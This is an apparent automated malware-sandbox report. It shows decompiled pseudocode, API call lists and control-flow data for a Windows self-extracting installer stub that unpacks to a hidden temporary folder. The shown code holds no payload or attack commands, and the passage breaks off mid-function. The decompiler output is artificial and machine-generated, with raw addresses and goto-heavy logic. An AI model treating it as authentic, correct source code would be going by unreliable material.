                                                                                                                                                                                                                                            				_t28 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E00A0468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E00A0468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0xa09a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0xa08b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0xa08a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00A06517(_t82, 0x7d2, 0, E00A03210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa09a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0xa091e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0xa091e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00A01781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00A06952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E00A0597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00A02630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E00A0658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0xa091e4;
                                                                                                                                                                                                                                            																					E00A01781(0xa091e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00A05467(0xa091e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00A02630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E00A0597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00A05467(0xa091e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0xa091e4;
                                                                                                                                                                                                                                            											_t70 = E00A02630(0, 0xa091e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0xa091e4;
                                                                                                                                                                                                                                            												_t71 = E00A05467(0xa091e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E00A0597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa08b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00A05467(0xa08b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E00A044B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00A06CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a057bf
                                                                                                                                                                                                                                            0x00a057cd
                                                                                                                                                                                                                                            0x00a057cd
                                                                                                                                                                                                                                            0x00a057dd
                                                                                                                                                                                                                                            0x00a057e3
                                                                                                                                                                                                                                            0x00a057ef
                                                                                                                                                                                                                                            0x00a057f5
                                                                                                                                                                                                                                            0x00a057f8
                                                                                                                                                                                                                                            0x00a0580a
                                                                                                                                                                                                                                            0x00a0580a
                                                                                                                                                                                                                                            0x00a057fa
                                                                                                                                                                                                                                            0x00a05802
                                                                                                                                                                                                                                            0x00a05802
                                                                                                                                                                                                                                            0x00a0580d
                                                                                                                                                                                                                                            0x00a0580f
                                                                                                                                                                                                                                            0x00a05830
                                                                                                                                                                                                                                            0x00a05836
                                                                                                                                                                                                                                            0x00a0583d
                                                                                                                                                                                                                                            0x00a0584b
                                                                                                                                                                                                                                            0x00a05851
                                                                                                                                                                                                                                            0x00a05855
                                                                                                                                                                                                                                            0x00a0585a
                                                                                                                                                                                                                                            0x00a0585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0585e
                                                                                                                                                                                                                                            0x00a0585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0585e
                                                                                                                                                                                                                                            0x00a05811
                                                                                                                                                                                                                                            0x00a05817
                                                                                                                                                                                                                                            0x00a05819
                                                                                                                                                                                                                                            0x00a0581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0581f
                                                                                                                                                                                                                                            0x00a05791
                                                                                                                                                                                                                                            0x00a05797
                                                                                                                                                                                                                                            0x00a0579c
                                                                                                                                                                                                                                            0x00a0579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a057a0
                                                                                                                                                                                                                                            0x00a057a9
                                                                                                                                                                                                                                            0x00a057ae
                                                                                                                                                                                                                                            0x00a057b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a057b0
                                                                                                                                                                                                                                            0x00a0579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05769
                                                                                                                                                                                                                                            0x00a05762
                                                                                                                                                                                                                                            0x00a05753
                                                                                                                                                                                                                                            0x00a0574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05864
                                                                                                                                                                                                                                            0x00a05864
                                                                                                                                                                                                                                            0x00a05864
                                                                                                                                                                                                                                            0x00a05717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056c3
                                                                                                                                                                                                                                            0x00a056c5
                                                                                                                                                                                                                                            0x00a056c9
                                                                                                                                                                                                                                            0x00a056ce
                                                                                                                                                                                                                                            0x00a056d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056d6
                                                                                                                                                                                                                                            0x00a056d6
                                                                                                                                                                                                                                            0x00a056d8
                                                                                                                                                                                                                                            0x00a056dd
                                                                                                                                                                                                                                            0x00a056df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056e1
                                                                                                                                                                                                                                            0x00a056e2
                                                                                                                                                                                                                                            0x00a056e4
                                                                                                                                                                                                                                            0x00a056e6
                                                                                                                                                                                                                                            0x00a056eb
                                                                                                                                                                                                                                            0x00a056ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056f3
                                                                                                                                                                                                                                            0x00a056f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0586c
                                                                                                                                                                                                                                            0x00a05878
                                                                                                                                                                                                                                            0x00a0587e
                                                                                                                                                                                                                                            0x00a05882
                                                                                                                                                                                                                                            0x00a05883
                                                                                                                                                                                                                                            0x00a05889
                                                                                                                                                                                                                                            0x00a0588e
                                                                                                                                                                                                                                            0x00a0588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05896
                                                                                                                                                                                                                                            0x00a056ed
                                                                                                                                                                                                                                            0x00a056df
                                                                                                                                                                                                                                            0x00a056d0
                                                                                                                                                                                                                                            0x00a056c1
                                                                                                                                                                                                                                            0x00a056a8
                                                                                                                                                                                                                                            0x00a0565b
                                                                                                                                                                                                                                            0x00a0565b
                                                                                                                                                                                                                                            0x00a0565d
                                                                                                                                                                                                                                            0x00a05669
                                                                                                                                                                                                                                            0x00a05669
                                                                                                                                                                                                                                            0x00a0565f
                                                                                                                                                                                                                                            0x00a0565f
                                                                                                                                                                                                                                            0x00a05665
                                                                                                                                                                                                                                            0x00a05667

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A055CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A05638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A0564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A05620
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A056B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A0571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A05737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A057CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A057EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A05802
                                                                                                                                                                                                                                              • Part of subcall function 00A02630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A02654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A05830
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FindResourceA.KERNEL32(00A00000,000007D6,00000005), ref: 00A0652A
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: LoadResource.KERNEL32(00A00000,00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A06538
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: DialogBoxIndirectParamA.USER32(00A00000,00000000,00000547,00A019E0,00000000), ref: 00A06557
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FreeResource.KERNEL32(00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A06560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A05878
                                                                                                                                                                                                                                              • Part of subcall function 00A0597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A059A8
                                                                                                                                                                                                                                              • Part of subcall function 00A0597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A059AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-1384155332
                                                                                                                                                                                                                                            • Opcode ID: 957bd7355d4285a2e877fbb9bbcedbde817ce41acb06a5cbc8b328dda98ce7ef
                                                                                                                                                                                                                                            • Instruction ID: ad37b95ac732ff0f60072756650757da854df5972ec00e1b6e09b5eacdaf2020
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 957bd7355d4285a2e877fbb9bbcedbde817ce41acb06a5cbc8b328dda98ce7ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 908105B0E04A0C9BDB20ABB4BD85BEB726DAF64340F4444A5F986D21D1EF748DC78E51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 324 a0597d-a059b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a059bb-a059d8 call a044b9 call a06285 324->325 326 a059dd-a05a1b GetDiskFreeSpaceA 324->326 341 a05c05-a05c14 call a06ce0 325->341 327 a05ba1-a05bde memset call a06285 GetLastError FormatMessageA 326->327 328 a05a21-a05a4a MulDiv 326->328 337 a05be3-a05bfc call a044b9 SetCurrentDirectoryA 327->337 328->327 331 a05a50-a05a6c GetVolumeInformationA 328->331 334 a05ab5-a05aca SetCurrentDirectoryA 331->334 335 a05a6e-a05ab0 memset call a06285 GetLastError FormatMessageA 331->335 339 a05acc-a05ad1 334->339 335->337 351 a05c02 337->351 344 a05ae2-a05ae4 339->344 345 a05ad3-a05ad8 339->345 349 a05ae6 344->349 350 a05ae7-a05af8 344->350 345->344 347 a05ada-a05ae0 345->347 347->339 347->344 349->350 353 a05af9-a05afb 350->353 354 a05c04 351->354 355 a05b05-a05b08 353->355 356 a05afd-a05b03 353->356 354->341 357 a05b20-a05b27 355->357 358 a05b0a-a05b1b call a044b9 355->358 356->353 356->355 360 a05b52-a05b5b 357->360 361 a05b29-a05b33 357->361 358->351 364 a05b62-a05b6d 360->364 361->360 363 a05b35-a05b50 361->363 363->364 365 a05b76-a05b7d 364->365 366 a05b6f-a05b74 364->366 368 a05b83 365->368 369 a05b7f-a05b81 365->369 367 a05b85 366->367 370 a05b96-a05b9f 367->370 371 a05b87-a05b94 call a0268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E00A0597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xa08004; // 0xe10713fe
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xa09124 = E00A06285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00A044B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xa09a34 & 0x00000008;
							if(( *0xa09a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xa09a38; // 0x0
								_t110 =  *((intOrPtr*)(0xa089e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xa09124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00A0268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
